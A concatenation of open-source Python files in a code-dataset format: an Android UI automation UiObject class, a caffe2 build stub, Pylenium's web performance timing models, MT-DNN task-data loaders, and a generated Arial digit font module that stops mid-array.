"""
def __init__(self, selector, android_device_driver):
self.selector = selector
self.android_device_driver = android_device_driver
def attributes(self, attrib_key, attrib_value, match_option=None):
"""Adds attributes locator with attrib_key=attrib_value to selector of current UiObject.
Note: attributes("text", "Chrome") would add a requirement of text=Chrome to
the current UiObject.
Args:
attrib_key: the key of the attribute.
attrib_value: the value of the attribute
match_option: the option for advanced matching
Returns:
New UiObject with attributes selector appended in selector.
"""
new_selector = self.selector.attributes(attrib_key, attrib_value,
match_option)
return UiObject(new_selector, self.android_device_driver)
def click(self):
"""Performs click action on element specified by current UiObject.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
parser = XmlParser(self.android_device_driver.fetch_current_xml())
point = parser.get_position_by_selector(self.selector)
self.android_device_driver.click(point.x, point.y)
def swipe(self, direction=DirectionType.RIGHT):
"""Performs click action on element specified by current UiObject.
Note this action will swipe from the center of current UiObject to its edge
according to the given direction.
Args:
direction: DirectionType which provides on which way to swipe,
DirectionType.RIGHT is default value.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
parser = XmlParser(self.android_device_driver.fetch_current_xml())
point = parser.get_position_by_selector(self.selector)
if point.x <= 0 and point.y <= 0:
return
bounds = parser.get_bounds_by_selector(self.selector)
dest_x, dest_y = 0, 0
if direction == DirectionType.UP:
dest_x, dest_y = point.x, bounds[1]
elif direction == DirectionType.DOWN:
dest_x, dest_y = point.x, bounds[3]
elif direction == DirectionType.LEFT:
dest_x, dest_y = bounds[0], point.y
elif direction == DirectionType.RIGHT:
dest_x, dest_y = bounds[2], point.y
self.android_device_driver.swipe(point.x, point.y, dest_x, dest_y)
def child(self, child_index):
"""Adds child to selector of current UiObject.
User can select nth child based on the parent:
Args:
child_index: index of the child.
Returns:
            New UiObject contains one extra child selector.
"""
new_selector = self.selector.child(child_index)
return UiObject(new_selector, self.android_device_driver)
def index(self, index):
"""Gets the indexth UiObject that matches its UiSelector.
User can select nth child based on the parent:
Args:
index: index of the UiObject.
Returns:
New UiObject contains one extra index selector.
"""
new_selector = self.selector.index(index)
return UiObject(new_selector, self.android_device_driver)
def custom_matcher(self, fn):
"""Adds custom matcher to selector of current UiObject.
        The user can define a match function. For example:
UiSelector().custom_matcher(lambda n: n.get("text") == 'Phone')
Args:
fn: the match function provided by user.
Returns:
New UiObject contains one extra custom_matcher selector.
"""
new_selector = self.selector.custom_matcher(fn)
return UiObject(new_selector, self.android_device_driver)
def parent(self):
"""Adds parent symbol to selector of current UiObject.
Returns:
New UiObject with "PARENT" appended in UiSelector's locator.
"""
parent_selector = self.selector.parent()
return UiObject(parent_selector, self.android_device_driver)
def sibling(self):
"""Adds sibling to selector of current UiObject.
Returns:
New UiObject contains one extra sibling selector.
"""
new_selector = self.selector.sibling()
return UiObject(new_selector, self.android_device_driver)
def text(self, value, match_option=None):
"""Adds text locator to selector of current UiObject.
        For this locator our framework will search in the 'text' field.
Args:
value: the text we are looking for.
match_option: the match option for the text
Returns:
New UiObject with "Text" appended in UiSelector's locator.
"""
return self.attributes("text", value, match_option)
def get_attributes(self):
"""Get the attribute list of the selected UiObject.
Returns:
List of (name, value) pairs for attributes.
"""
parser = XmlParser(self.android_device_driver.fetch_current_xml())
node = parser.find_first_element_by_selector(self.selector)
return node.items()
def verify(self, key, value):
"""Verify is selected key, value pair exists the selected UiObject.
Match is case insensitive.
Args:
key: the key for verification
value: the desired value under key.
Returns:
True if exists, else false.
"""
parser = XmlParser(self.android_device_driver.fetch_current_xml())
node = parser.find_first_element_by_selector(self.selector)
if key in node.keys():
if node.get(key).lower() == value.lower():
return True
return False
def content_desc(self, value, match_option=None):
"""Adds description locator to selector of current UiObject.
For this locator our framework will search in 'content-desc' field.
Args:
value: the text we are looking for.
match_option: the match option for the text
Returns:
New UiObject with "content-desc" appended in UiSelector's locator.
"""
return self.attributes("content-desc", value, match_option)
def resource_id(self, value, match_option=None):
"""Adds resource_id locator to selector of current UiObject.
For this locator our framework will search in 'resource-id' field.
Args:
value: the text we are looking for.
match_option: the match option for the text
Returns:
New UiObject with "resource_id" appended in UiSelector's locator.
"""
return self.attributes("resource-id", value, match_option)
def verify_exist(self):
"""Verify whether the element specified by the current UiObject exists.
Returns:
True if the element exists, false otherwise.
"""
parser = XmlParser(self.android_device_driver.fetch_current_xml())
node = parser.find_first_element_by_selector(self.selector)
if node is None:
return False
else:
return True
def left(self):
"""Adds left symbol to selector of current UiObject.
Returns:
New UiObject with "(Location.DIRECTION, DirectionType.LEFT)" appended in
UiSelector's locator.
"""
left_selector = self.selector.left()
return UiObject(left_selector, self.android_device_driver)
def right(self):
"""Adds right symbol to selector of current UiObject.
Returns:
New UiObject with "(Location.DIRECTION, DirectionType.RIGHT)" appended in
UiSelector's locator.
"""
right_selector = self.selector.right()
return UiObject(right_selector, self.android_device_driver)
def up(self):
"""Adds up symbol to selector of current UiObject.
Returns:
New UiObject with "(Location.DIRECTION, DirectionType.UP)" appended in
UiSelector's locator.
"""
up_selector = self.selector.up()
return UiObject(up_selector, self.android_device_driver)
def down(self):
"""Adds down symbol to selector of current UiObject.
Returns:
New UiObject with "(Location.DIRECTION, DirectionType.DOWN)" appended in
UiSelector's locator.
"""
down_selector = self.selector.down()
return UiObject(down_selector, self.android_device_driver)
def get_bounds(self):
"""Gets the bounds of UIElement specified by current UiObject.
Returns:
The bounds of current UIElement [X1, Y1, X2, Y2]
"""
parser = XmlParser(self.android_device_driver.fetch_current_xml())
return parser.get_bounds_by_selector(self.selector)
def get_center_pos(self):
"""Gets center position of UIElement specified by current UiObject.
Returns:
The center position of current UIElement [X1, Y1]
"""
parser = XmlParser(self.android_device_driver.fetch_current_xml())
return parser.get_position_by_selector(self.selector)
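
# ---------------------------------------------------------------------------
# Usage sketch (not part of the library): one possible chained query flow.
# `android_device_driver` is assumed to be an already-connected driver object
# and `ui_selector` a fresh instance of this package's UiSelector class; the
# texts and resource ids below are illustrative assumptions only.
# ---------------------------------------------------------------------------
def _example_flow(android_device_driver, ui_selector):
    """Minimal sketch showing how UiObject locators can be chained."""
    # Find a row whose title text is "Settings", then inspect and interact with it.
    row = (UiObject(ui_selector, android_device_driver)
           .resource_id("android:id/title")
           .text("Settings")
           .index(0))
    if row.verify_exist():
        print(row.get_bounds())
        row.click()
        row.parent().swipe(DirectionType.LEFT)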
|
caffe2/python/build.py | Hacky-DH/pytorch | 60,067 | 12610923 |
import caffe2.python._import_c_extension as C
CAFFE2_NO_OPERATOR_SCHEMA = C.define_caffe2_no_operator_schema
build_options = C.get_build_options()
|
pylenium/performance.py | gleekzorp/pyleniumio | 169 | 12610925 | <filename>pylenium/performance.py
import logging
import time
from typing import Union, List, Optional
from pydantic import BaseModel, Field
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.wait import WebDriverWait
def stopwatch(func):
""" Stopwatch Decorator.
Use this decorator on any function to measure how long it took
for the function to complete. This is in seconds, but may have fractions of a second
if the system clock provides more precision.
Notes:
This is _logged_, not printed to the Terminal
Examples:
1. How long does it take to add an item to the cart?
@stopwatch
def add_item_to_cart(py):
py.get('#add-item').click()
py.get('#added-notification').should().be_visible()
2. How long does it take to edit an item's available stock via the API
and see it change in the UI?
@stopwatch
def update_available_stock(py, item, quantity):
payload = {'item': item, 'qty': quantity}
api.items.update(payload)
py.get(f'#available-stock-{item}').should().have_text(quantity)
"""
    def wrapper(*args, **kwargs):
        log = logging.getLogger('driver')
        start_time = time.time()
        result = func(*args, **kwargs)  # keep the wrapped function's return value
        stop_time = time.time()
        func_name = func.__name__
        log.info(f'STOPWATCH - {func_name} took {stop_time - start_time} seconds')
        return result
    return wrapper
class Performance:
""" Pylenium's Performance API. """
def __init__(self, webdriver):
self._webdriver = webdriver
def _wait(self, timeout=10):
return WebDriverWait(self._webdriver, timeout=timeout)
def get(self):
""" The main method used to generate a WebPerformance object from the current web page.
Notes:
Calling this method too soon may yield NoneTypes because the browser hasn't generated them yet.
Examples:
# Store the entire WebPerformance object and log it
perf = py.performance.get()
py.log.info(perf.dict())
# Get a single data point from WebPerformance
tti = py.performance.get().time_to_interactive()
"""
return WebPerformance(
time_origin=self.get_time_origin(),
navigation_timing=self.get_navigation_timing(),
paint_timing=self.get_paint_timing(),
resources=self.get_resources()
)
def get_time_origin(self) -> float:
""" Returns the timeOrigin precision value.
This is the high resolution timestamp of the start time of the performance measurement.
"""
js = 'return window.performance.timeOrigin;'
time_origin = self._wait().until(lambda driver: driver.execute_script(js), 'Time Origin not generated yet')
return time_origin
def get_navigation_timing(self):
""" Return the PerformanceNavigationTiming object as a Python object. """
js = 'return window.performance.getEntriesByType("navigation")[0];'
navigation = self._wait().until(lambda driver: driver.execute_script(js), 'NavigationTiming not generated yet')
return NavigationTiming(**navigation)
def get_paint_timing(self):
""" Return the PerformancePaintTiming object as a Python object. """
js = 'return window.performance.getEntriesByName("first-contentful-paint")[0];'
paint = self._wait().until(lambda driver: driver.execute_script(js), 'PaintTiming not generated yet')
return PaintTiming(**paint)
def get_resources(self):
""" Return a list of PerformanceResourceTiming objects as Python objects. """
js = 'return window.performance.getEntriesByType("resource");'
try:
resources = self._wait().until(
lambda driver: driver.execute_script(js),
message='Resources not generated yet or there are none')
return [ResourceTiming(**resource) for resource in resources]
except TimeoutException:
return None # because there were no Resources captured for the current web page
class NavigationTiming(BaseModel):
""" The PerformanceNavigationTiming Representation.
Metrics regarding the browser's document navigation events
References:
https://developer.mozilla.org/en-US/docs/Web/API/PerformanceNavigationTiming
"""
connect_end: float = Field(alias='connectEnd')
connect_start: float = Field(alias='connectStart')
decoded_body_size: Union[int, float] = Field(alias='decodedBodySize')
dom_complete: float = Field(alias='domComplete')
dom_content_loaded_event_end: float = Field(alias='domContentLoadedEventEnd')
dom_content_loaded_event_start: float = Field(alias='domContentLoadedEventStart')
time_to_interactive: float = Field(alias='domInteractive')
domain_lookup_end: float = Field(alias='domainLookupEnd')
domain_lookup_start: float = Field(alias='domainLookupStart')
duration: float
encoded_body_size: Union[int, float] = Field(alias='encodedBodySize')
entry_type: str = Field(alias='entryType')
fetch_start: float = Field(alias='fetchStart')
initiator_type: str = Field(alias='initiatorType')
load_event_end: float = Field(alias='loadEventEnd')
load_event_start: float = Field(alias='loadEventStart')
name: str
next_hop_protocol: str = Field(alias='nextHopProtocol')
redirect_count: int = Field(alias='redirectCount')
redirect_end: int = Field(alias='redirectEnd')
redirect_start: int = Field(alias='redirectStart')
request_start: float = Field(alias='requestStart')
response_end: float = Field(alias='responseEnd')
response_start: float = Field(alias='responseStart')
secure_connection_start: float = Field(alias='secureConnectionStart')
server_timing: List = Field(alias='serverTiming')
start_time: int = Field(alias='startTime')
transfer_size: Union[int, float] = Field(alias='transferSize')
type: str
unload_event_end: int = Field(alias='unloadEventEnd')
unload_event_start: int = Field(alias='unloadEventStart')
worker_start: Union[int, float] = Field(alias='workerStart')
class PaintTiming(BaseModel):
""" The PerformancePaintTiming Representation.
Provides timing information about "paint" (also called "render") operations during web page construction.
References:
https://developer.mozilla.org/en-US/docs/Web/API/PerformancePaintTiming
"""
duration: float
entry_type: str = Field(alias='entryType', default='paint')
name: str = Field(default='first-contentful-paint')
start_time: float = Field(alias='startTime')
class ResourceTiming(BaseModel):
""" The PerformanceResourceTiming Representation.
Detailed network timing data regarding the loading of an application's resources.
An application can use the timing metrics to determine, for example, the length of time it takes
to fetch a specific resource, such as an XMLHttpRequest, <SVG>, image, or script.
References:
https://developer.mozilla.org/en-US/docs/web/api/performanceresourcetiming
"""
connect_end: float = Field(alias='connectEnd')
connect_start: float = Field(alias='connectStart')
decoded_body_size: int = Field(alias='decodedBodySize')
domain_lookup_end: float = Field(alias='domainLookupEnd')
domain_lookup_start: float = Field(alias='domainLookupStart')
duration: float
encoded_body_size: int = Field(alias='encodedBodySize')
entry_type: str = Field(alias='entryType', default='resource')
fetch_start: float = Field(alias='fetchStart')
initiator_type: str = Field(alias='initiatorType')
name: str
next_hop_protocol: str = Field(alias='nextHopProtocol')
redirect_end: float = Field(alias='redirectEnd')
redirect_start: float = Field(alias='redirectStart')
request_start: float = Field(alias='requestStart')
response_end: float = Field(alias='responseEnd')
response_start: float = Field(alias='responseStart')
secure_connection_start: float = Field(alias='secureConnectionStart')
server_timing: List = Field(alias='serverTiming')
start_time: float = Field(alias='startTime')
transfer_size: int = Field(alias='transferSize')
worker_start: float = Field(alias='workerStart')
class WebPerformance(BaseModel):
""" Pylenium's WebPerformance Object.
This is built using multiple W3C Performance Timing objects to provide
custom data points like:
* Page Load Time
* Time to First Contentful Paint
* Time to Interactive (TTI)
* and more!
"""
time_origin: float # High resolution timestamp of the start time of the Performance measurement
navigation_timing: NavigationTiming
paint_timing: PaintTiming
resources: List[ResourceTiming]
def page_load_time(self) -> float:
""" The time it takes for the page to load as experienced by the user. """
return self.navigation_timing.load_event_end - self.navigation_timing.start_time
def time_to_first_byte(self) -> float:
""" The time it takes before the first byte of response is received from the server. """
return self.navigation_timing.response_start
def time_to_first_contentful_paint(self) -> float:
""" The time it takes for the majority of content to be fully rendered and consumable by the user. """
return self.paint_timing.start_time
def time_to_interactive(self) -> float:
""" The time it takes for the layout to be stabilized and the page is responsive. """
return self.navigation_timing.dom_complete
def number_of_requests(self) -> int:
""" The number of requests sent from start of navigation until end of page load. """
return len(self.resources)
def time_to_dom_content_loaded(self) -> float:
return self.navigation_timing.dom_content_loaded_event_end
def page_weight(self) -> float:
""" The amount of bytes transferred for the page to be loaded. """
resource_transfer_size = sum([r.transfer_size for r in self.resources])
return self.navigation_timing.transfer_size + resource_transfer_size
def connection_time(self) -> float:
""" The time taken to connect to the server. """
return self.navigation_timing.connect_end - self.navigation_timing.connect_start
def request_time(self) -> float:
""" The time taken to send a request to the server and receive the response. """
return self.navigation_timing.response_end - self.navigation_timing.response_start
def fetch_time(self) -> float:
""" The time to complete the document fetch (including accessing any caches, etc.). """
return self.navigation_timing.response_end - self.navigation_timing.fetch_start
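
# ---------------------------------------------------------------------------
# Usage sketch (illustrative only, not part of Pylenium): gather WebPerformance
# for the current page and log a few derived metrics. `webdriver` is assumed to
# be any Selenium WebDriver instance that has already navigated to a page.
# ---------------------------------------------------------------------------
def _example_report(webdriver):
    """Minimal sketch: log page load time, FCP, TTI and request count."""
    perf = Performance(webdriver).get()
    logging.getLogger('driver').info(
        'PERFORMANCE - load=%.1fms, fcp=%.1fms, tti=%.1fms, requests=%d',
        perf.page_load_time(),
        perf.time_to_first_contentful_paint(),
        perf.time_to_interactive(),
        perf.number_of_requests(),
    )
    return perf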
|
mtdnn/common/tokenization_utils.py | microsoft/mt-dnn | 113 | 12610948 | <gh_stars>100-1000
# coding=utf-8
# Copyright (c) Microsoft. All rights reserved.
import json
from typing import Union
import numpy as np
from mtdnn.common.types import DataFormat, TaskType, TaskDefType
from mtdnn.tasks.config import get_task_obj
def load_task_data(
file_path_or_processed_data_list: Union[str, list], task_def: TaskDefType
):
"""Load data in MT-DNN Format
Arguments:
file_path_or_processed_data_list {Union[str, list]} -- File path or processed rows object
task_def {dict} -- Task Definition to be loaded
Raises:
ValueError: Invalid Task requested
Returns:
list -- list of processed data in MT-DNN Format
"""
assert task_def, "[ERROR] - Task Definition cannot be none"
data_format = task_def.data_format
task_type = task_def.task_type
label_dict = task_def.label_vocab
if task_type == TaskType.Ranking:
assert data_format == DataFormat.PremiseAndMultiHypothesis
if isinstance(file_path_or_processed_data_list, str):
processed_data = open(file_path_or_processed_data_list, encoding="utf-8")
elif isinstance(file_path_or_processed_data_list, list):
processed_data = file_path_or_processed_data_list
rows = []
for line in processed_data:
fields = line.strip("\n").split("\t")
if data_format == DataFormat.PremiseOnly:
assert len(fields) == 3
row = {"uid": fields[0], "label": fields[1], "premise": fields[2]}
elif data_format == DataFormat.PremiseAndOneHypothesis:
assert len(fields) == 4
row = {
"uid": fields[0],
"label": fields[1],
"premise": fields[2],
"hypothesis": fields[3],
}
elif data_format == DataFormat.PremiseAndMultiHypothesis:
assert len(fields) > 5
row = {
"uid": fields[0],
"ruid": fields[1].split(","),
"label": fields[2],
"premise": fields[3],
"hypothesis": fields[4:],
}
elif data_format == DataFormat.Sequence:
row = {
"uid": fields[0],
"label": eval(fields[1]),
"premise": eval(fields[2]),
}
elif data_format == DataFormat.MRC:
row = {
"uid": fields[0],
"label": fields[1],
"premise": fields[2],
"hypothesis": fields[3],
}
else:
raise ValueError(data_format)
task_obj = get_task_obj(task_def)
if task_obj is not None:
row["label"] = task_obj.input_parse_label(row["label"])
elif task_type == TaskType.Ranking:
labels = row["label"].split(",")
if label_dict is not None:
labels = [label_dict[label] for label in labels]
else:
labels = [float(label) for label in labels]
row["label"] = int(np.argmax(labels))
row["olabel"] = labels
elif task_type == TaskType.Span:
pass # don't process row label
elif task_type == TaskType.SequenceLabeling:
assert type(row["label"]) is list
row["label"] = [label_dict[label] for label in row["label"]]
rows.append(row)
return rows
def load_score_file(score_path: str = "", n_class: int = 1):
sample_id_2_pred_score_seg_dic = {}
score_obj = json.loads(open(score_path, encoding="utf-8").read())
assert (len(score_obj["scores"]) % len(score_obj["uids"]) == 0) and (
len(score_obj["scores"]) / len(score_obj["uids"]) == n_class
), "[ERROR] - scores column size should equal to sample count or multiple of sample count (for classification problem)"
scores = score_obj["scores"]
score_segs = [
scores[i * n_class : (i + 1) * n_class] for i in range(len(score_obj["uids"]))
]
for sample_id, pred, score_seg in zip(
score_obj["uids"], score_obj["predictions"], score_segs
):
sample_id_2_pred_score_seg_dic[sample_id] = (pred, score_seg)
return sample_id_2_pred_score_seg_dic
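
if __name__ == "__main__":
    # Minimal sketch (not part of MT-DNN): exercise load_score_file on a tiny,
    # hand-made score file. The file name, uids and score values are made up
    # purely for illustration; a real score file is produced by the predictor.
    import os
    import tempfile

    fake_scores = {
        "uids": ["sample-0", "sample-1"],
        "predictions": [0, 1],
        "scores": [0.9, 0.1, 0.2, 0.8],  # two classes per sample -> n_class=2
    }
    with tempfile.NamedTemporaryFile("w", suffix=".json", delete=False) as fh:
        json.dump(fake_scores, fh)
        tmp_path = fh.name
    try:
        # Expected: {'sample-0': (0, [0.9, 0.1]), 'sample-1': (1, [0.2, 0.8])}
        print(load_score_file(tmp_path, n_class=2))
    finally:
        os.remove(tmp_path)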
|
minihinch/gui/fonts/arial_50.py | aabbtree77/esp32-mqtt-experiments | 198 | 12610957 | # Code generated by font_to_py.py.
# Font: Arial.ttf Char set: 0123456789:
# Cmd: ./font_to_py.py Arial.ttf 50 arial_50.py -x -c 0123456789:
version = '0.33'
def height():
return 50
def baseline():
return 49
def max_width():
return 37
def hmap():
return True
def reverse():
return False
def monospaced():
return False
def min_ch():
return 48
def max_ch():
return 63
_font =\
b'\x25\x00\x00\x03\xfe\x00\x00\x00\x1f\xff\xc0\x00\x00\x7f\xff\xf0'\
b'\x00\x00\xff\xff\xf8\x00\x01\xff\xff\xfc\x00\x03\xff\xff\xfe\x00'\
b'\x07\xfe\x03\xff\x00\x07\xf8\x00\xff\x80\x0f\xf0\x00\x7f\x80\x0f'\
b'\xe0\x00\x3f\x80\x0f\xc0\x00\x1f\xc0\x1f\xc0\x00\x1f\xc0\x1f\xc0'\
b'\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x03\x80\x00\x0f\xc0\x00\x00\x00'\
b'\x0f\xc0\x00\x00\x00\x0f\xc0\x00\x00\x00\x1f\x80\x00\x00\x00\x3f'\
b'\x80\x00\x00\x00\x7f\x00\x00\x00\x00\xff\x00\x00\x00\x01\xfe\x00'\
b'\x00\x00\x03\xfc\x00\x00\x00\x07\xf8\x00\x00\x00\x0f\xf0\x00\x00'\
b'\x00\x1f\xe0\x00\x00\x00\x3f\xc0\x00\x00\x00\x7f\x80\x00\x00\x00'\
b'\x7f\x00\x00\x00\x00\xfe\x00\x00\x00\x00\xfc\x00\x00\x00\x01\xfc'\
b'\x00\x00\x00\x01\xfc\x00\x00\x00\x01\xf8\x00\x00\x00\x01\xf8\x00'\
b'\x00\x00\x01\xf8\x00\x00\x00\x01\xf8\x00\x00\x00\x01\xf8\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xf8\x00\x00\x00\x01'\
b'\xf8\x00\x00\x00\x01\xf8\x00\x00\x00\x01\xf8\x00\x00\x00\x01\xf8'\
b'\x00\x00\x00\x01\xf8\x00\x00\x00\x00\x00\x00\x00\x25\x00\x00\x00'\
b'\x00\x00\x00\x00\x03\xfe\x00\x00\x00\x0f\xff\x80\x00\x00\x3f\xff'\
b'\xe0\x00\x00\x7f\xff\xf0\x00\x00\xff\xff\xf8\x00\x01\xff\xff\xfc'\
b'\x00\x03\xfe\x07\xfc\x00\x03\xfc\x01\xfe\x00\x07\xf0\x00\xfe\x00'\
b'\x07\xf0\x00\x7f\x00\x07\xe0\x00\x3f\x00\x0f\xe0\x00\x3f\x00\x0f'\
b'\xc0\x00\x1f\x80\x0f\xc0\x00\x1f\x80\x0f\xc0\x00\x1f\x80\x0f\xc0'\
b'\x00\x1f\x80\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00'\
b'\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f'\
b'\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0'\
b'\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f'\
b'\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80'\
b'\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x0f\xc0\x00\x1f\x80\x0f\xc0\x00'\
b'\x1f\x80\x0f\xc0\x00\x1f\x80\x0f\xc0\x00\x1f\x80\x0f\xe0\x00\x3f'\
b'\x80\x07\xe0\x00\x3f\x00\x07\xf0\x00\x7f\x00\x07\xf8\x00\xff\x00'\
b'\x03\xfc\x01\xfe\x00\x03\xff\x07\xfe\x00\x01\xff\xff\xfc\x00\x00'\
b'\xff\xff\xf8\x00\x00\x7f\xff\xf0\x00\x00\x3f\xff\xe0\x00\x00\x0f'\
b'\xff\x80\x00\x00\x03\xfe\x00\x00\x25\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x07\x80\x00\x00\x00\x0f\x80\x00\x00\x00\x0f\x80\x00\x00\x00'\
b'\x1f\x80\x00\x00\x00\x3f\x80\x00\x00\x00\x7f\x80\x00\x00\x00\xff'\
b'\x80\x00\x00\x03\xff\x80\x00\x00\x07\xff\x80\x00\x00\x0f\xff\x80'\
b'\x00\x00\x3f\xff\x80\x00\x00\xff\xdf\x80\x00\x01\xff\x9f\x80\x00'\
b'\x01\xfe\x1f\x80\x00\x01\xfc\x1f\x80\x00\x01\xf0\x1f\x80\x00\x01'\
b'\xc0\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00'\
b'\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f'\
b'\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80'\
b'\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00'\
b'\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00'\
b'\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00'\
b'\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f'\
b'\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80'\
b'\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00'\
b'\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00'\
b'\x00\x00\x00\x00\x25\x00\x00\x00\x00\x00\x00\x00\x03\xfe\x00\x00'\
b'\x00\x1f\xff\xc0\x00\x00\x7f\xff\xe0\x00\x01\xff\xff\xf8\x00\x03'\
b'\xff\xff\xfc\x00\x03\xff\xff\xfc\x00\x07\xfe\x07\xfe\x00\x0f\xf0'\
b'\x00\xff\x00\x0f\xe0\x00\x7f\x00\x0f\xc0\x00\x3f\x00\x1f\xc0\x00'\
b'\x3f\x80\x1f\x80\x00\x1f\x80\x1f\x80\x00\x1f\x80\x03\x80\x00\x1f'\
b'\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80'\
b'\x00\x00\x00\x3f\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x7f\x00\x00'\
b'\x00\x00\xfe\x00\x00\x00\x01\xfe\x00\x00\x00\x03\xfc\x00\x00\x00'\
b'\x07\xf8\x00\x00\x00\x0f\xf0\x00\x00\x00\x1f\xe0\x00\x00\x00\x3f'\
b'\xe0\x00\x00\x00\x7f\xc0\x00\x00\x00\xff\x80\x00\x00\x01\xfe\x00'\
b'\x00\x00\x03\xfc\x00\x00\x00\x07\xf8\x00\x00\x00\x1f\xf0\x00\x00'\
b'\x00\x3f\xe0\x00\x00\x00\x7f\xc0\x00\x00\x00\xff\x80\x00\x00\x01'\
b'\xfe\x00\x00\x00\x03\xfc\x00\x00\x00\x07\xf8\x00\x00\x00\x07\xf0'\
b'\x00\x00\x00\x0f\xe0\x00\x00\x00\x0f\xe0\x00\x00\x00\x1f\xff\xff'\
b'\xff\x80\x1f\xff\xff\xff\x80\x3f\xff\xff\xff\x80\x3f\xff\xff\xff'\
b'\x80\x3f\xff\xff\xff\x80\x3f\xff\xff\xff\x80\x00\x00\x00\x00\x00'\
b'\x25\x00\x00\x00\x00\x00\x00\x00\x07\xfc\x00\x00\x00\x1f\xff\x80'\
b'\x00\x00\x7f\xff\xe0\x00\x00\xff\xff\xf0\x00\x01\xff\xff\xf8\x00'\
b'\x03\xff\xff\xfc\x00\x07\xfc\x07\xfe\x00\x0f\xf0\x01\xfe\x00\x0f'\
b'\xe0\x00\xfe\x00\x0f\xc0\x00\x7f\x00\x1f\xc0\x00\x3f\x00\x1f\x80'\
b'\x00\x3f\x00\x03\x80\x00\x3f\x00\x00\x00\x00\x3f\x00\x00\x00\x00'\
b'\x3f\x00\x00\x00\x00\x7e\x00\x00\x00\x00\xfe\x00\x00\x00\x01\xfc'\
b'\x00\x00\x00\x0f\xf8\x00\x00\x01\xff\xf0\x00\x00\x01\xff\xe0\x00'\
b'\x00\x01\xff\xe0\x00\x00\x01\xff\xf8\x00\x00\x01\xff\xfc\x00\x00'\
b'\x01\x8f\xfe\x00\x00\x00\x01\xff\x00\x00\x00\x00\x7f\x00\x00\x00'\
b'\x00\x3f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\xc0\x00\x00\x00'\
b'\x0f\xc0\x00\x00\x00\x0f\xc0\x00\x00\x00\x0f\xc0\x00\x00\x00\x0f'\
b'\xc0\x00\x00\x00\x0f\xc0\x03\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0'\
b'\x1f\xc0\x00\x1f\x80\x1f\xc0\x00\x1f\x80\x0f\xe0\x00\x3f\x80\x0f'\
b'\xf0\x00\x7f\x00\x07\xf8\x00\xff\x00\x07\xfe\x03\xfe\x00\x03\xff'\
b'\xff\xfc\x00\x01\xff\xff\xf8\x00\x00\xff\xff\xf0\x00\x00\x7f\xff'\
b'\xe0\x00\x00\x1f\xff\x80\x00\x00\x03\xfc\x00\x00\x25\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xf0\x00\x00\x00\x03'\
b'\xf0\x00\x00\x00\x07\xf0\x00\x00\x00\x0f\xf0\x00\x00\x00\x0f\xf0'\
b'\x00\x00\x00\x1f\xf0\x00\x00\x00\x3f\xf0\x00\x00\x00\x7f\xf0\x00'\
b'\x00\x00\x7f\xf0\x00\x00\x00\xff\xf0\x00\x00\x01\xff\xf0\x00\x00'\
b'\x01\xff\xf0\x00\x00\x03\xfb\xf0\x00\x00\x07\xf3\xf0\x00\x00\x0f'\
b'\xf3\xf0\x00\x00\x0f\xe3\xf0\x00\x00\x1f\xc3\xf0\x00\x00\x3f\x83'\
b'\xf0\x00\x00\x7f\x83\xf0\x00\x00\x7f\x03\xf0\x00\x00\xfe\x03\xf0'\
b'\x00\x01\xfc\x03\xf0\x00\x03\xfc\x03\xf0\x00\x03\xf8\x03\xf0\x00'\
b'\x07\xf0\x03\xf0\x00\x0f\xf0\x03\xf0\x00\x0f\xe0\x03\xf0\x00\x1f'\
b'\xc0\x03\xf0\x00\x3f\x80\x03\xf0\x00\x7f\x80\x03\xf0\x00\x7f\xff'\
b'\xff\xff\xc0\x7f\xff\xff\xff\xc0\x7f\xff\xff\xff\xc0\x7f\xff\xff'\
b'\xff\xc0\x7f\xff\xff\xff\xc0\x7f\xff\xff\xff\xc0\x00\x00\x03\xf0'\
b'\x00\x00\x00\x03\xf0\x00\x00\x00\x03\xf0\x00\x00\x00\x03\xf0\x00'\
b'\x00\x00\x03\xf0\x00\x00\x00\x03\xf0\x00\x00\x00\x03\xf0\x00\x00'\
b'\x00\x03\xf0\x00\x00\x00\x03\xf0\x00\x00\x00\x03\xf0\x00\x00\x00'\
b'\x03\xf0\x00\x00\x00\x00\x00\x00\x25\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7f\xff\xff\x00\x00\x7f\xff\xff\x00\x00\xff'\
